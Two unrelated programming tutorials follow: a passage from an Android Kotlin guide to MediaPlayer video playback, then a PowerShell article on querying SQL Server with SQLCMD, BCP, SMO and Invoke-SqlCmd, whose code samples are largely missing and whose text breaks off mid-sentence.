playback position in seconds of the video. Next, convert the seconds to a more readable format by replacing // TODO (4) with: private fun timeInString(seconds: Int): String { return String.format( "%02d:%02d", (seconds / 3600 * 60 + ((seconds % 3600) / 60)), (seconds % 60) ) } In this function you convert seconds to MM:SS format. If the video is more than 60 seconds long, it’s better to show 2:32 minutes rather than 152 seconds. In adition, you’ll create three functions that initialize and periodically update seekbar and convert the seconds to a more readable format. To initialize seekbar, replace // TODO (5) with: private fun initializeSeekBar() { // 1 seek_bar.max = mediaPlayer.seconds // 2 text_progress.text = getString(R.string.default_value) text_total_time.text = timeInString(mediaPlayer.seconds) // 3 progress_bar.visibility = View.GONE // 4 play_button.isEnabled = true } When MediaPlayer prepares to play the video this function is executed. The code performs the following: - Sets the maximum value for SeekBar - Sets default values for TextViewswhich shows the progress and the total duration of the video. - Hides the ProgressBar. - Enables the play button. Next, to periodically update the seekbar as the video plays, replace // TODO (6) with: private fun updateSeekBar() { runnable = Runnable { text_progress.text = timeInString(mediaPlayer.currentSeconds) seek_bar.progress = mediaPlayer.currentSeconds handler.postDelayed(runnable, SECOND.toLong()) } handler.postDelayed(runnable, SECOND.toLong()) } In this function, you use Runnable to execute the code periodically after every one second. Runnable is a Java interface and executes on a separate thread. Since it executes on a separate thread, it won't block your UI and the SeekBar and TextViews will update periodically. Instead of playing the video when MediaPlayer is ready, it would be better if the user could play and pause the video by using the imageButton. Inside the onCreate() function replace // TODO (7) with: play_button.setOnClickListener { // 1 if (mediaPlayer.isPlaying) { // 2 mediaPlayer.pause() play_button.setImageResource(android.R.drawable.ic_media_play) } else { // 3 mediaPlayer.start() play_button.setImageResource(android.R.drawable.ic_media_pause) } } Here you: - Check if MediaPlayeris playing any video. - If it is, you pause the video and change the button icon to play. - If not, you play the video and change the button icon to pause. Next, replace all the code added to the onPrepared()'s body with a call to initalizeSeekBar() and updateSeekBar() which you created earlier: initializeSeekBar() updateSeekBar() Now your app is more intuitive. Build and Run. You can play or pause the video and see the progress on seekBar and TextView. Interacting with the SeekBar Now the app is more intuitive for the user, except for the SeekBar. Even though the SeekBar updates with time, you can't fast-forward or rewind the video by tapping or dragging it. For that, you'll use the onProgressChanged() method of SeekBar. Whenever there's a change in the SeekBar's progress, it will invoke this function. The SeekBar change listener is already in the code, so navigate to onProgressChanged() and replace // TODO (8) with: if (fromUser){ mediaPlayer.seekTo(progress * SECOND) } The function onProgressChanged() has three parameters: - seekBar: Instance of the seekBar. - progress: Progress of seekBarin seconds. - fromUser: Boolean which tells you if the change is because of user interaction. If the change in progress is due to user interaction, it'll be true. If not, it'll be false. You use this parameter to update MediaPlayer's progress if the seekbar's progress level is manually changed. Now your user can fast-forward or rewind the video using seekBar. Build and run to give it a try. :] Playing Video from the Gallery The app works great now, but it would be better if users could select a video from their gallery and play it. You'll implement that next. The options button in the toolbar and its functionality are already in the starter project. Before you add new code, you need to understand what's happening in the existing code. When the user selects an option the app invokes onOptionItemSelected() with the menuItem as a parameter. Now, inside the when statement replace // TODO (9) with: // 1 val intent = Intent() // 2 intent.type = "video/*" // 3 intent.action = Intent.ACTION_GET_CONTENT // 4 startActivityForResult(Intent.createChooser(intent, getString(R.string.select_file)), GET_VIDEO) Here you use an intent to get the URI for the file the user selected from the gallery. In the code: - You get an Intent which is a messaging object in Android used to request different action types. - You ensure that the intent type is a video format. - Then you specify this is an Intent with an action of GET content type. - Finally, you trigger the intent waiting for a result. Playing the video after it has been downloaded Once the activity returns something from the intent, startActivityForResult() invokes onActivityResult(), which passes GET_VIDEO as a request_code. Inside the startActivityForResult() function replace // TODO (10) with: // 1 if (resultCode == Activity.RESULT_OK) { // 2 if (requestCode == GET_VIDEO) { // 3 selectedVideoUri = data?.data!! // 4 video_view.holder.addCallback(this) } } Here you: - Check the resultCode. If the operation was executed successfully, it returns Activity.RESULT_OK. - Check the requestCodeto identify the caller and define if the requestCode was actually a video. - Assign URI to the selectedVideoUrivariable you declared earlier. - Invoke surfaceCreated()by calling video_view.holder.addCallback(this). It will probably ask you to import Activity, so add it at the top with your other inputs with: import android.app.Activity Next, update setDataSource() so you pass the correct URI in the parameter. Navigate to surfaceCreated() and replace the function body with: mediaPlayer.apply { setDataSource(applicationContext, selectedVideoUri) setDisplay(surfaceHolder) prepareAsync() } Voila! Now your user can open the gallery, select a video and play it in your app. Build and run to see how it works now. Releasing the Resources MediaPlayer API consumes a lot of resources. So, you should always release those resources by calling release(). As per the official Android documentation, you should release the resources whenever your app is in background or stopped state. Failing to could lead to continuous battery consumption for the device and playback failure for other apps if multiple instances of the same codec aren't supported. It could also degrade the device's performance in general. In onDestroy(), replace // TODO (11) with: handler.removeCallbacks(runnable) mediaPlayer.release() Here you remove the runnable from the thread or message queue by calling removeCallbacks(). If you didn't, your runnable would keep executing in the background. Build and Run. It looks like nothing changed, but you ensured the resources release when the user kills the app. Executing Asynchronously Asynchronous code is very important for Android apps. You may have not noticed, but currently, you are loading the video asynchronously. In most cases, videos are heavy and take time to load, therefore, you need to make the code asynchronous. When that happens, MediaPlayer will lead the app to ANR, or Application Not Responding, state. In short, your app will become non-responsive and crash. To load the media file asynchronously what you did was using prepareAsync() instead of prepare() inside the surfaceCreated() function. In other words, if you try to use prepare() in that line and run the app, it will be there loading for a long time. Seriously, that's it! That's all you had to do. Next, you'll implement asynchronously streaming a video from a URL. Streaming a Video From a URL Fortunately, you don't have to make many changes to prepare MediaPlayer asynchronously and stream a video from a URL. In surfaceCreated(), replace setDataSource() with: setDataSource(URL) Then, in surfaceCreated() replace prepare() with prepareAsync(). After you make those changes, surfaceCreated() will look like this: override fun surfaceCreated(surfaceHolder: SurfaceHolder) { mediaPlayer.apply { setDataSource(URL) setDisplay(surfaceHolder) prepareAsync() } } Nice! Now your MyTube app can play videos from res directory, gallery and even stream a video from a URL. Before you finish, there's one more topic you need to explore: DRM, or Digital Right Management. Digital Right Management DRM, or Digital Right Management, technologies are a set of tools that protect or encrypt video and audio files. There are many technologies to help with that, such as Microsoft's PlayReady and Google's Widevine. Working with DRM-protected files is a topic worthy of it's own tutorial. MediaPlayer added support to play DRM protected videos in Android 8 with API 26. If you want to play a DRM protected video, either you have to set your app's minSdkVersion to 26, or annotate your class with @RequiresApi(Build.VERSION_CODES.O). DRM MediaPlayer Because DRM mostly relies on the security-by-obscurity principle, it's hard to get your hands on any DRM protected media files. You won't play a DRM protected file as it's too complicated for this tutorial. Instead, you'll see an overview of the changes you have to make to play a DRM protected file. Take a look at onCreate() again. You'll see this: mediaPlayer.setOnDrmInfoListener(this) This line of code tells MediaPlayer it could be accessing a DRM protected file. You don't have to worry about the app crashing if the media file is not DRM protected: It takes care of that itself. If the media file is DRM protected the app invokes onDrmInfo(). After that, inside onDrmInfo() replace // TODO (12) with : mediaPlayer?.apply { // 1 val key = drmInfo?.supportedSchemes?.get(0) key?.let { // 2 prepareDrm(key) // 2 val keyRequest = getKeyRequest( null, null, null, MediaDrm.KEY_TYPE_STREAMING, null ) provideKeyResponse(null, keyRequest.data) } } Here you: - Fetch the UUID, or key, of the DRM scheme in use. There are several types of DRM protection schemes. Examine the map of UUIDs in drmInfo?.supportedSchemes?.get(0)and retrieve the supported schemes. Schemes supported depend mainly on the device and OEM, if you ever get a DRM, you will need to dive deeper on this topic. - Pass this retrieved key to prepareDrm()to prepare the DRM. - Get the decrypt key from the licensed server using getKeyRequest(). - Then provide the key response from the license server to the DRM engine plugin using provideKeyResponse(). Android Studio will most likely ask you to import the DRM library, so add the following line to the top of your file with your other imports: import android.media.MediaDrm This code is only for demonstration purposes. Because of this, it won't affect the app since you don't have access to any DRM protected files. If you ever have to work with a DRM protected media file, a better alternative would be using ExoPlayer because it provides more functionalities. Where To Go From Here? Congratulations on your first MediaPlayer app! You can download the final project using the Download Materials button at the top or bottom of this tutorial. In this tutorial, you covered some basics of MediaPlayer like: - Understanding MediaPlayerand its states. - Playing video from the res/raw folder. - Playing video from a URL. - Async Programming. - Best practices for media player. - Digital Right Management. While you covered a lot in this tutorial, there's still more to learn. For a next step, explore ExoPlayer. Google created ExoPlayer, a library that lets you take advantage of features not yet supported by MediaPlayer API, such as DASH and SmoothStreaming. To learn more about ExoPlayer check out our ExoPlayer tutorial. I hope you enjoyed this tutorial. If you have any questions or comments, please join the discussion below. :]
https://www.raywenderlich.com/14273655-mediaplayer-simplified-video-playback-on-android
CC-MAIN-2021-04
refinedweb
3,152
58.89
10 September 2009 12:05 [Source: ICIS news] ?xml:namespace> November PVC and LLDPE contracts fell by 0.57% to yuan (CNY) 6,930/tonne ($1,015/tonne) and 0.09% to CNY10,455/tonne respectively, according to data from the Dalian Commodity Exchange (DCE), as trading sentiment was dampened slightly by a decline in the Chinese stock exchanges, a local PVC producer said. Trading volume for November PVC futures fell to 81,348, a 38% decline from Wednesday and the lowest since late July, as market players preferred to stay on the sidelines in the absence of new market developments, the producer added. ($1 = CNY6.83) With additional reporting by Chow Bee Lin For more on LLDPE.
http://www.icis.com/Articles/2009/09/10/9246431/china+polymers+futures+edge+down+on+subdued+sentiment.html
CC-MAIN-2013-20
refinedweb
118
61.97
! Anything you dont understand just ask. Add a Smart Tag to a Control on a Form, Report, or Data Access Page -------------------------- 1. Open the form, report, or data access page in Design View. 2. Select a control and then click Properties on the toolbar to open the control's property sheet. 3. Click on the Data Tab. 4. In the SmartTags property box, do one of the following: Click the Build button in the SmartTags property box to open the Smart Tags dialog box. Click the smart tag that you want to add to the control, and then click OK. Type the namespace Uniform Resource Identifier (URI) for the smart tag in the SmartTags property field. (Select PersonName) Any update on your issue? I have been struggling with this on and off for years - I wrote a database my the sailing club 10 years ago and they keep pestering me to do this update and I have been unable to get it to work - so thanks sorry for the late reply - I have a day job and I am doing this update to the database for free!
https://www.experts-exchange.com/questions/27634395/Email-from-access-2003.html
CC-MAIN-2018-13
refinedweb
187
77.98
Module std.checkedint This module defines facilities for efficient checking of integral operations against overflow, casting with loss of precision, unexpected change of sign, etc. The checking (and possibly correction) can be done at operation level, for example opChecked !"+"(x, y, overflow) adds two integrals x and y and sets overflow to true if an overflow occurred. The flag overflow (a bool passed by reference) is not touched if the operation succeeded, so the same flag can be reused for a sequence of operations and tested at the end. Issuing individual checked operations is flexible and efficient but often tedious. The Checked facility offers encapsulated integral wrappers that do all checking internally and have configurable behavior upon erroneous results. For example, Checked!int is a type that behaves like int but aborts execution immediately whenever involved in an operation that produces the arithmetically wrong result. The accompanying convenience function checked uses type deduction to convert a value x of integral type T to Checked!T by means of checked(x). For example: void main() { import std .checkedint, std.checkedint, std .stdio; writeln((checked(5) + 7).stdio; writeln((checked(5) + 7) .get); // 12 writeln((checked(10) * 1000 * 1000 * 1000).get); // 12 writeln((checked(10) * 1000 * 1000 * 1000) .get); // Overflow }.get); // Overflow } Similarly, checked(-1) > uint(0) aborts execution (even though the built-in comparison int(-1) > uint(0) is surprisingly true due to language's conversion rules modeled after C). Thus, Checked!int is a virtually drop-in replacement for int useable in debug builds, to be replaced by int in release mode if efficiency demands it. Checked has customizable behavior with the help of a second type parameter, Hook. Depending on what methods Hook defines, core operations on the underlying integral may be verified for overflow or completely redefined. If Hook defines no method at all and carries no state, there is no change in behavior, i.e. Checked!(int, void) is a wrapper around int that adds no customization at all. This module provides a few predefined hooks (below) that add useful behavior to Checked: These policies may be used alone, e.g. Checked!(uint, WithNaN) defines a uint-like type that reaches a stable NaN state for all erroneous operations. They may also be "stacked" on top of each other, owing to the property that a checked integral emulates an actual integral, which means another checked integral can be built on top of it. Some combinations of interest include: The hook's members are looked up statically in a Design by Introspection manner and are all optional. The table below illustrates the members that a hook type may define and their influence over the behavior of the Checked type using it. In the table, hook is an alias for Hook if the type Hook does not introduce any state, or an object of type Hook otherwise. Example int[] concatAndAdd(int[] a, int[] b, int offset) { // Aborts on overflow on size computation auto r = new int[(checked(a .length) + b.length) + b .length).length) .get]; // Aborts on overflow on element computation foreach (i; 0 .. a.get]; // Aborts on overflow on element computation foreach (i; 0 .. a .length) r[i] = (a[i] + checked(offset)).length) r[i] = (a[i] + checked(offset)) .get; foreach (i; 0 .. b.get; foreach (i; 0 .. b .length) r[i + a.length) r[i + a .length] = (b[i] + checked(offset)).length] = (b[i] + checked(offset)) .get; return r; } writeln(concatAndAdd([1, 2, 3], [4, 5], -1)); // [0, 1, 2, 3, 4].get; return r; } writeln(concatAndAdd([1, 2, 3], [4, 5], -1)); // [0, 1, 2, 3, 4] Example Saturate stops at an overflow auto x = (cast(byte) 127) .checked!Saturate; writeln(x); // 127 x++; writeln(x); // 127.checked!Saturate; writeln(x); // 127 x++; writeln(x); // 127 Example WithNaN has a special "Not a Number" (NaN) value akin to the homonym value reserved for floating-point values auto x = 100 .checked!WithNaN; writeln(x); // 100 x /= 0; assert(x.checked!WithNaN; writeln(x); // 100 x /= 0; assert(x .isNaN);.isNaN); Example ProperCompare fixes the comparison operators ==, !=, <, <=, >, and >= to return correct results uint x = 1; auto y = x .checked!ProperCompare; assert(x < -1); // built-in comparison assert(y > -1); // ProperCompare.checked!ProperCompare; assert(x < -1); // built-in comparison assert(y > -1); // ProperCompare Example Throw fails every incorrect operation by throwing an exception import std .exception : assertThrown; auto x = -1.exception : assertThrown; auto x = -1 .checked!Throw; assertThrown(x / 0); assertThrown(x + int.checked!Throw; assertThrown(x / 0); assertThrown(x + int .min); assertThrown(x == uint.min); assertThrown(x == uint .max);.max);
https://dlang.org/library/std/checkedint.html
CC-MAIN-2022-40
refinedweb
762
50.43
Hi, I need to set the ListView caching to recycle and it works. The problem is when I need to filter the results, the objects inside goes blank. To filter I use: txtPesquisa.TextChanged += (sender, e) => { lista.BeginRefresh(); lista.ItemsSource = ClientesBD.GetClientes(txtPesquisa.Text); lista.EndRefresh(); }; Answers My Listview: ` lista = new MyListView(ListViewCachingStrategy.RecycleElement) { Margin = new Thickness(10), RowHeight = 60, ItemTemplate = new DataTemplate(typeof(ClienteCell)) My Template: ` [Foundation.Preserve(AllMembers = true)] public class ClienteCell : ViewCell { protected override void OnBindingContextChanged() { base.OnBindingContextChanged(); }` Have you tried filtering with System.Linq instead? lista.ItemsSource = ClientesBD.GetClientes.Where(w => w.nome.ToLower().Contains(txtPesquisa.Text.ToLower())).ToList(); You would need the GetClientEs() method to return all results if null. Code isn't tested but should work. @seanyda Thanks for your answer. It doesn't work anyway. Inside the method I am using Linq to filter the results. It filters, but the list view turns blank lines. I use System.Linq to do all my filtering from a list, It's always worked perfectly. If you can show me all your code I might be able to fix it for you. @seanyda Did you placed the caching strategy to recycle? here you go: @seanyda You could solved it?
https://forums.xamarin.com/discussion/105726/listview-listviewcachingstrategy-recycleelement
CC-MAIN-2018-51
refinedweb
203
62.24
I want to filter down a dataframe. Trying to use the standard boolean (multiple) expressions but it doesn't work. My code is: import pandas as pd import numpy as np # Setting a dataframe dates = pd.date_range('1/1/2000', periods=10) df1 = pd.DataFrame(np.random.randn(10, 4), index=dates, columns=['A', 'B', 'C', 'D']) # Filtering df1 = df1.loc[lambda df: -0.5 < df1.A < 0 and 0 <= df1.B <= 1, :] No need for the anonymous lambda function. Simply filter with a boolean statement. Also, notice the use of the bitwise operator, &, not boolean operator, and. Below are equivalent variants to filtering: df1 = df1.query('(A > -0.5) & (A < 0) & (B >= 0) & (B <= 1)', engine='python')) df1 = df1.loc[(df1.A > -0.5) & (df1.A < 0) & (df1.B >= 0) & (df1.B <= 1)] df1 = df1[(df1.A > -0.5) & (df1.A < 0) & (df1.B >= 0) & (df1.B <= 1)] Consider even using pandas.Series.between: df1 = df1.loc[(df1.A.between(-0.5, 0, inclusive=False) & (df1.B.between(0, 1))]
https://codedump.io/share/7GQdFgBjjqUQ/1/filter-down-dataframe
CC-MAIN-2016-44
refinedweb
171
73.64
I just finished reading the copy of Django 1.1 Testing and Debugging by Karen M. Tracey provided to us for review by Packt Publishing. For those of you who don’t know, Karen is a core developer of Django and her knowledge and experience in the framework shines through in this book. This is a great book for people who want to transition from being a hobbyist tinkering on Django sites to professional developers. It will be a lot to digest for a newcomer to Django and might not contain much new information if you’ve been working with Django for a while (and writing tests for your code). The book covers: - doctests vs. unit tests - integrating external tools like Nose, Coverage, and Twill - debugging with logging, Django Debug Toolbar, and pdb - how to get help from the Django community and file bugs - troubleshooting Apache/mod_wsgi deployments Even though I’ve been working with Django for a few years now, I still picked up some great tips and got a few nice refreshers after reading the book. In Chapter 5, Karen describes how to use Twill instead of the built-in test client. As somebody who has written tests for multi-page form wizards with an automatically generated hash, I wish I had thought of this technique at the time. By using Twill, you can ignore auto-filled form fields and just test the functionality you care about. Another great thing about this book are the non-trivial code samples included. I love reading other people’s code. You can learn a lot by seeing how other people solve problems and their general coding style. One item that struck me was the use of reverse(admin:[url_name]) in some of the examples. I had missed the addition of URL namespaces in Django 1.1 and will definitely be integrating them into my code in the future. If you don’t have much experience with testing or real debugging (not sprinkling!
http://lincolnloop.com/blog/2010/jun/16/django-11-testing-and-debugging-book-review/
CC-MAIN-2013-48
refinedweb
331
62.07
PL22.16/09-0104 = WG21 N29. 2.local])) shall not be used to declare an entity with linkage.to: A name with no linkage (notably, the name of a class or enumeration declared in a local scope (3.3.3 .8. 5.1.2 [expr.prim.lambda] paragraph 2 says, A closure object behaves as a function object (20.7 [function.objects])... This linkage to <functional> increases the dependency of the language upon the library and is inconsistent with the definition of “freestanding” in 17.6.1.3 [compliance]. Rationale (July, 2009): The reference to 20.7 [function.objects] appears in a note, not in normative text, and is intended only to clarify the meaning of the term “function object.” The CWG does not believe that this reference creates any dependency on any library facility. .14.2 [lex.icon] : No mention of true or false as an integer literal. From 2.14.7.4.1 [temp.point] paragraph 1 the indicated words: Otherwise, the point of instantiation for such a specialization immediately follows the namespace scope declaration or definition that refers to the specialization. Remove in 14.7.4.1 [temp.point] paragraph 3 the indicated words: Otherwise, the point of instantiation for such a specialization immediately precedes the namespace scope declaration or definition that refers to the specialization. Remove in 14.8 X<T>;.3 .7 [temp.res]. An example would also be helpful. Rationale (April, 2006): The CWG felt that the wording was already clear enough. According to 14.8.8.8.8 . The Standard currently specifies (7.1.3 [dcl.typedef] paragraph 9, 14. Consider: template <class T> void f(T&); template <class T> void f(const T&); void m() { const int p = 0; f(p); }Some compilers treat this as ambiguous; others prefer f(const T&). The question turns out to revolve around whether 14. In language imported directly from the C Standard, 16.2 [cpp.include] paragraph 5 says, The implementation provides unique mappings for sequences consisting of one or more nondigits (2.11 .11 .8. According to 3.3.9 [basic.scope.req] paragraph 2, In a constrained context .) According to 3.4.3 [basic.lookup.qual] paragraph 7, In a constrained context (14.11 [temp.constrained]), the identifier of an unqualified-id prefixed by a nested-name-specifier that nominates a dependent type T is looked up as follows: for each template requirement C<args> such that either T or an equivalent type (14.11.1 [temp.req]) is a template argument to C, the identifier of the unqualified-id is looked up as if the nested-name-specifier nominated C<args> instead of T (3.4.3.3 [concept.qual]), except that only the names of associated types and class templates (14.11.1 [temp.req]) is a constrained member and shall occur only in a class template (14.6.1 [temp.class]) or nested class thereof. The member-declaration for a constrained member shall declare a member function. A constrained member is treated as a constrained template (14.11 [temp.constrained]) whose template requirements include the requirements specified in its member-requirement clause and the requirements of each enclosing constrained template. Furthermore, 14.6.2 [temp.mem] paragraph 9 says, A member template of a constrained class template is itself a constrained template ? The grammar for constrained-template-parameter given in 14.6.1 [temp.class] paragraph 5, which currently reads, A constrained member (9.2 [class.mem]) in a class template is declared only in class template specializations in which its template requirements (14.11.1 [temp.req]) are satisfied .6.7 [temp.alias] but, unless a good use case is presented, should probably be prohibited. On the other hand,.) In the example in. 14.10.2.1 [concept.map.fct] paragraph 5 says, Each satisfied associated function (or function template) requirement has a corresponding associated function candidate set. An associated function candidate set is a candidate set ); } 14.10.2.2 [concept.map.assoc] paragraph 5 says, If an associated type or class template 14.10.2.1 [concept.map.fct]. Deduction of the associated type (in 20.2.9 [concept.copymove], similar to TriviallyCopyConstructible and TriviallyCopyAssignable. (14.11 [temp.constrained]) whose template requirements include the requirements specified in its member-requirement clause and the requirements of each enclosing constrained template. See also 14.10.1.1 [concept.fct] paragraph 10 for a similar rule for default implementations. A more general version of this merging of requirements is needed, but it does not appear to exist. 14.11.1.2 [temp.req.impl] would seem to be the logical place for such a rule. The example at the end of (14.11.2.1 [temp.archetype.assemble] paragraph 1) and 14.8 14.11.2.1 [temp.archetype.assemble] paragraph 5 its archetype will have a deleted destructor. As a result, several examples in the current wording are ill-formed: 14.10.2 [concept.map] paragraph 11: the add function. 14.10.3.1 [concept.member.lookup] paragraph 3: the f function. (Also missing the copy constructor requirement.) 14.10.3.1 [concept.member.lookup] paragraph 5: the h function. (Also missing the copy constructor requirement.) 14.11.1 [temp.req] paragraph 3: the f function. 14.11.1.1 [temp.req.sat] paragraph 6: the g function. (Also missing the copy constructor requirement.) 14.11.2 [temp.archetype] paragraph 15: the distance function. 14.11.2.1 [temp.archetype.assemble] paragraph 2: the foo function. 14.11.2.1 [temp.archetype.assemble] paragraph 3: the f function. 14.11.4 [temp.constrained.inst] paragraph 4 is ill-formed. The call to advance(i, 1) in f attempts to pass 1 to a parameter declared as Iter::difference_type, but there is nothing that says that int is compatible with Iter::difference_type. Any use of a pointer to deleted storage, even if the pointer is not dereferenced, produces undefined behavior (3.7.4.2 [basic.stc.dynamic.deallocation] paragraph 4). The reason for this restriction is that, on some historical architectures, deallocating an object might free a memory segment, resulting in a hardware exception if a pointer referring to that segment were loaded into a pointer register, and on those architectures use of a pointer register for moving and comparing pointers was the most efficient mechanism for these operations. It is not clear whether current or foreseeable architectures still require such a draconian restriction or whether it is feasible to relax it only to forbid a smaller range of operations. Of particular concern is the use of atomic pointers, which might be used in race conditions involving deallocation, where the loser of the race might encounter this undefined behavior. (See also issue 312.) Rationale (April, 2007): The current specification is clear and was well-motivated. Analysis of whether this restriction is still needed should be done via a paper and discussed in the Evolution Working Group rather than being handled by CWG as an issue/defect... According to 7.1.5 [dcl.constexpr] paragraph 3, no declarations are permitted in the body of a constexpr function. This seems overly restrictive. At least three kinds of declarations would seem to be helpful in writing such functions: static_assert, typedef and alias declarations, and local automatic variables initialized with constant expressions. (Similar considerations apply to lambdas in which the lambda-return-type-clause is omitted.) Rationale (July, 2009): This suggestion needs a proposal and analysis by EWG before it can be considered by CWG. . 14.8.
http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2938.html
CC-MAIN-2016-18
refinedweb
1,253
50.12
. December’s Course of the Month is now available! Enroll to learn ITIL® Foundation best practices for delivering IT services effectively and efficiently.(java.lang.Object, int, java.lang.Object, int, int) It is not a classwork but a skill evaluation question which I did not do very well. So I would like to see different solutions. But thanks for your direction. RD a linked list is a data structure in which a seiries of node objects with data types of Node nextNode in them and they point to the next node in the list....... check that out for some decent ifno Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected. -------------------------- public class MyArray { private int max = 10; private Object[] objs = new Object[max]; private int increment = 10; private int size = 0; public void add( Object o ) { if (size == max ) { max = max + increment; Object[] temp = new Object[max]; System.arraycopy( objs, 0, temp, 0, size ); objs = temp; } objs[size++] = o; } public int size() { return size; } public void remove(int index) { System.arraycopy(objs, index+1, objs, index, size-index); objs[--size] = null; } public Object get( int index) { if (index>=size || index <0) throw new ArrayIndexOutOfBoundsExcep return objs[index]; } } -------------------------- kimboon If you HAVE to create your own the one above looks about right EXCEPT the size you should return is the number of items that have been added, not the physical size of the array as if you try to return an uninitialised cell you'll get an unwanted Exception. (i.e. java.util.Vector returns the number of items added not the physical size of the internal storage array). Also, wherever possible, you should try to implement applicable interfaces. In this case, implementing the Collection interface would make the class very useful (and powerful). I agree with you that we should always consider the use of existing API. I'm sure rdong is aware of Vector class (since he mentioned it himself), but I believe his purpose is to understand how we can implement a Vector class using the basic array... Or maybe is just to know how Java array can be "expandable" ? I don't know, leave it to rdong to answer :) BTW, to make my code posted above complete, I forgot to include the checking of index in remove() method. Thanks.
https://www.experts-exchange.com/questions/20949711/how-to-implement-an-expandable-array.html
CC-MAIN-2017-51
refinedweb
407
59.53
Naming the Patron Object— Rovani in C♯ There are only two hard things in Computer Science: cache invalidation and naming things. - Phil Karlton To any seasoned developer, this is entirely too true, and many people have written extensively on why this is so hard. For this particular exercise, I have to decide what to the call the core object that represents a (potentially) giving unit in Vigil. Trolling through existing applications, here some options I have come across, and why I rejected them: - Client - feels too impersonal for a DRM, though I know there are non-profits that use this as their preferred term. - Constituent - the term is mostly used with voting system. Also, I am really loathe to type out “Constituent” thousands of times. - Customer - this term is associated more with a point-of-sale system than a donation tracking system. - Donor - not all names in the database are going to be actual donors. Some will just be people that purchased something, many will not even have given (in a system I recent worked on, around 55% of the names were non-donors). - Entity - this conflicts heavily with Entity Framework, where the Entity object is used everywhere. - Patron - this is a compelling term, since it has the dual definition of being both a person who gives financially, and a customer to a store. The other part of the name is that it needs to pair with all of the auxilary tables that will be prefixed with: - ____Address - ____Attachment - ____BankAccount - ____Code - ____ContactBase - ____CreditCard - ____Date - ____Identifier - ____Note - ____Number - ____Payment - ____Person - ____Phone - ____Relationship And that’s just the preliminary list! I had initially gone with Entity, since that it is what our current system uses. However, I quickly tired of running into the namespace conflicts with EF, and thus went searching for alternatives. I had almost settled on Constituent, until I went to start the re-factoring and after the twelfth time of typing it, realized it was going to cause CTS. Patron was a late find that I stumbled upon. Thesauruses are my friends. So far, I am really digging it. I figure I get one re-factoring before I hit the point of no return. I am hoping this is the right one.
https://rovani.net/Naming-The-Patron-Object/
CC-MAIN-2018-47
refinedweb
373
61.36
What extra do I need to access SQL Server from PowerShell? You don’t need anything additional in the way of .NET libraries or PowerShell modules to work with SQL Server, but for many scripting tasks you can get a lot of extra value from using them. The approach that you choose towards accessing SQL Server depends on the sort of task you need to produce a script for. - If you need to just perform queries against SQL Server databases and save the results to a file, then we can just run SQLCMD or BCP from PowerShell. - You can choose to load the .NET data provider. This gives you a lot more versatility, but you are working at a lower level, having to create in code what is already built into SQLCMD - You can load SMO or even SQLPS, the SQL Server provider that uses SMO behind the scenes. SMO is used primarily to provide all the functionality for SQL Server Management Studio. Anything you can do in SSMS you can also automate in SMO. - With SQLPS, you can read the output from the cmdlet Invoke-sqlcmd into PowerShell’s native data objects, and you can process the results and save data to file in a number of formats such as XML The same is true of outputting data from PowerShell. The built-in features of PowerShell are enough to get you a long way, but what you use depends on your task. If you need more … - A lot can be done with command-line tools such as BCP - You can use modules or functions to provide extra, such as writing out in Excel spreadsheet format This article is all about how you get started with all these approaches, and about how you can load and use the modules and assemblies to do this safely and effectively. The Various methods of working with SQL Server Running an External command-line Program You can run external command-line programs such as OSQL , BCP or SQLCMD. You can call those external programs inside PowerShell and then use them to query the SQL Server instance: This example will query the test table and redirect the output to a txt file Another approach is to use BCP utility which allows us very fast import or export of a table, view or query. In the following example we are exporting the product table from AdventureWorks2014: Something to be aware of is that, if we get an error using this coding style, it will not be visible. The output will be the same. The difference will be that the BCPError.txt will have the error. Let’s export a table that does not exists called IdontExist so as to deliberately cause an error: ‘So Laerte, how can I test in my code if it was successful or not?’ One approach is to use a property that is returned by the start-process called ExitCode. If it is 0, it was running with no errors and 1, of course, an error occurred. Saving the output in a variable: Saving only the ExitCode property: Or even, testing the property directly: You can read more about BCP here: Working with the bcp Command-line Utility Querying SQL Server via the .NET data provider If you don’t need SMO for any other reason, you can query SQL metadata or data, or to work with any kind of SQL Server Object, by using the System.Data.SqlClient Namespace – the .NET Framework Data Provider for SQL Server. It will allow you to use T-SQL commands and then manage what you need in much the same way as you would with the SMO database connection methods. It does not require you to load anything extra, because the namespace is already loaded by PowerShell. In your test database, execute this… And then, in PowerShell, amend the server instance name and database, and run the script If your result set returns more than one table, you can use the DataAdapter and Dataset class: In addition, you may want to execute a stored procedure: Using SMO SMO is a .NET library that enables you to work with SQL Server as objects, classes, methods and so on. When you access a database on a server, the database object provides an open System.Data.SqlClient connection that is exposed by the Database.ExecuteNonQuery and Database.ExecuteWithResults methods that you can use for querying either the server or a database. You can use it in the same way that you use any other SqlClient connection. Check out my Stairway to Server Management Objects (SMO) Level 1: Concepts and Basics on SQLServerCentral.com. Unlike the previous method, you need to load the SMO assembly before you can use SMO. The traditional way of doing this is to use the .NET method LoadWithPartialName. This isn’t ideal, and we’ll be discussing refinements to this method later on in the article. Using SQLPS If you use SQLPS, you will not only be able to use SMO’s own .NET connection for querying databases but you will also have the SQL CmdLet’s. Everytrhing you need is loaded for you under the covers.The Cmdlet to use for executing SQL is Invoke-SQLCMD, but you can get a complete list of CmdLet’s that are available for use once you have loaded SQLPS by using the PowerShell command … Invoke-SQLCMD Invoke-SQLCMD is a compiled cmdlet from SQLPS. You can also run several .SQL files. For that let’s use the amazing SQL Server Diagnostic Information Queries for September 2014 from Glenn Berry, copy some SQL from there and split into .sql files. I´ve created three .sql files: FileNamesPaths.SQL, ServerProperties.SQL and SQLServerAgentjobsCategory.SQL One approach is using the :r parameter inside a .sql file. First create a .sql file with the .SQL files to run: Let’s call this file SQLFiles.SQL Then it´s just run the .sql file It will run all the .SQL files you have specified in the SQLFiles.SQL You may want to export to a txt file the output of all files ran: This approach can be very useful if you just need to check the output, not generating reports, or even create objects in SQL Server – an full environment for instance. Another approach is to call invoke-SQLCMD for each file. For that we don’t need the SQLFiles.SQL You can, of course, export the results to CSV files: Even better, you can write an XLSX file from one or more CSV files with each CSV file turned into a Worksheet. For that, we can use the function of my fellow PowerShell MVP Boe Prox called Convert-CSVToExcel (you can download the source from the top of this article) You can also run Community functions such as Invoke-SQLCMD2, a System.Data.SQLClient based function wrote by Chad Miller that extends the functionality of Invoke-SQLCMD. You just need to download it and run it inside your script, save into .ps1 file and call the function as a .ps1 script, load it in your profile or even save the code in a psm1 file (script module file) and save in any path shown by the $env:psmodulepath to load directly when calling it (PowerShell 3.0 and higher) Installing Module. To Install a 